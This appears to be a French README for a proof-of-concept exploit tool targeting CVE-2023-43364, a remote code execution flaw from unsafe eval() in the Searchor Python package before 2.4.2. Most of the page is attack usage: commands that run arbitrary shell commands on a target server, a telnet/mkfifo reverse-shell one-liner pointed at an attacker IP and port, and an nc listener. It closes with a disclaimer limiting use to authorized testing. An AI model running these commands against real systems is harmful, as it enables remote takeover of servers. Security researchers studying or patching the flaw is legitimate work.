
POC exploit via unsafe `eval()` usage in Searchor (< 2.4.2)
Exécution de code à distance (RCE) via l'utilisation non sécurisée de
eval()dans Searchor (< 2.4.2)
Ce projet démontre l'exploitation de CVE-2023-43364, une vulnérabilité d'exécution de code à distance (RCE) affectant le package Python Searchor (< 2.4.2).
Le problème est causé par l'utilisation non sécurisée de eval() sur une entrée contrôlée par l'utilisateur, permettant aux attaquants d'injecter et d'exécuter du code Python arbitraire.
La vulnérabilité a été corrigée en supprimant l'utilisation non sécurisée de eval(), comme le montre le correctif officiel :
Informations techniques supplémentaires et avis :
Cette preuve de concept fournit plusieurs méthodes d'exécution, notamment l'exécution de commandes, la validation de test et les shells inversés.
Exécutez une commande simple (id) pour vérifier l'exécution du code :
python3 CVE-2023-43364.py <URL> --test
Exécutez une commande personnalisée Exécutez n'importe quelle commande sur le serveur cible :
python3 CVE-2023-43364.py <URL> -a "whoami"
Exemples :
python3 CVE-2023-43364.py <URL> -a "TF=$(mktemp -u);mkfifo $TF && telnet IP PORT 0<$TF | sh 1>$TF"
python3 CVE-2023-43364.py <URL> -a "ls -la"
Shell inversé Démarrez un écouteur sur votre machine :
nc -lvnp 4444
Exécutez l'exploit :
python3 CVE-2023-43364.py <URL> <LHOST>
Ce projet est destiné à :
L'auteur n'est pas responsable de toute mauvaise utilisation ou des dommages causés par cet outil.
Utilisez cet exploit uniquement dans des environnements contrôlés ou sur des systèmes pour lesquels vous avez une autorisation explicite de test.